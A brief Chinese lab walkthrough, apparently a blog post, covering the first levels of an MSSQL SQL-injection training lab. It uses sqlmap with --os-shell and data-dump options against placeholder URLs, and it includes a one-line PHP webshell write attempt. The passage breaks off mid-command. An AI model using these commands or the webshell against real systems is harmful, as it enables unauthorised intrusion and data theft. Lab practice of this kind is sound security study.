
Less-1:
1.利用sqlmap尝试获取shell:sqlmap -u http://*/mssql/less-1.asp?id=1* --os-shell ;
2.成功拿到shell之后,可以执行whoami、ipconfig等相关操作,同理可以利用sqlmap爆破数据。
Less-2:
1.利用sqlmap获取shell:sqlmap -u "http://*/mssql/less-2.asp?id=1" --os-shell;
2.拿到shell之后,查看权限,发现权限较低;
3.尝试利用echo "<?php system($_GET['cmd']);?>" > shell.php写入Webshell,失败;
4.可利用sqlmap爆破数据。
Less-3:
利用sqlmap获取shell:sqlmap -u "http://*/mssql/less-3.asp?id=1*" --os-shell。
Less-4:
1.利用sqlmap尝试获取shell:sqlmap -u "http://*/mssql/less-4.asp?id=1*" --os-shell ,发现失败,但可成功注入;
2.爆数据库名,sqlmap -u "http://*/mssql/less-4.asp?id=1*" --dbs;
3.爆表名,sqlmap -u "http://*/mssql/less-4.asp?id=1*" -D test --tables;
4.爆数据,sqlmap -u "http://*/mssql/less-4.asp?id=1*" -D test -T users --dump。
Less-5:
1.sqlmap -u "http://*/mssql/less-5.as

1169

被折叠的 条评论
为什么被折叠?



